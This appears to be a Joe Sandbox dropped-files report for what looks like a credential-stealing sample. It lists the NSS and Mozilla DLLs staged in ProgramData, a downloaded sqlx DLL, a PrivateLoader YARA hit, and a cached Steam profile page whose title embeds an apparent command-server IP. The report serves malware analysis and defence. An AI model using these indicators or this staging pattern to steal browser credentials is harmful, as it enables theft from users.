                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\BGDAAKJJDAAK\freebl3.dll

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):685392
                                                                                                                                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                • Filename: 1WQoGZnpTG.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: Mh578aJbfT.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: ouTBFyJGN3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: WS89wB6DGK.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: 0d4n5OS22R.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: TCBNakHd95.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: v5jT7owmfn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: rI4M7XBuY3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\BGDAAKJJDAAK\mozglue.dll

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):608080
                                                                                                                                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                • Filename: 1WQoGZnpTG.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: Mh578aJbfT.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: ouTBFyJGN3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: WS89wB6DGK.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: 0d4n5OS22R.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: TCBNakHd95.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: v5jT7owmfn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: rI4M7XBuY3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\BGDAAKJJDAAK\msvcp140.dll

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):450024
                                                                                                                                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\BGDAAKJJDAAK\nss3.dll

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2046288
                                                                                                                                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\BGDAAKJJDAAK\softokn3.dll

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):257872
                                                                                                                                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dll

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):80880
                                                                                                                                                                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dll, Author: Joe Security
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199681720597[1].htm

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):34771
                                                                                                                                                                                                                                                                Entropy (8bit):5.3843653404896905
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:Edpqm+0Ih3YAA9CWGIWfcDAoPzzgiJmDzJtxvrfJkPVoEAdmPzzgiJmDzJtxvJ28:Ed8m+0Ih3YAA9CWGIWFoPzzgiJmDzJt/
                                                                                                                                                                                                                                                                MD5:B8719A1861962262D390617FEC83C72E
                                                                                                                                                                                                                                                                SHA1:1CAFE529AF3EE421C5A478F3404C4748D6D95C4D
                                                                                                                                                                                                                                                                SHA-256:A762A4EB54C1E217B0466FCB48B569E5928F0DB2C4E09B07207908EF49F3DA7C
                                                                                                                                                                                                                                                                SHA-512:D746C3AAC9045C6EE0D63C4FA24D0B2690992472F0A98A1BF9405919E5A3F6C3EF19AB1DF75472BA6CCCD88325ADCFF8C75E3DA0C4CB33920FE630850629CCB3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: p5.r https://65.109.242.112|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link hr

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2459136
                                                                                                                                                                                                                                                                Entropy (8bit):6.052474106868353
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                                                                                                                                                                                                MD5:90E744829865D57082A7F452EDC90DE5
                                                                                                                                                                                                                                                                SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                                                                                                                                                                                                SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                                                                                                                                                                                                SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):685392
                                                                                                                                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):608080
                                                                                                                                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):450024
                                                                                                                                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2046288
                                                                                                                                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):257872
                                                                                                                                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

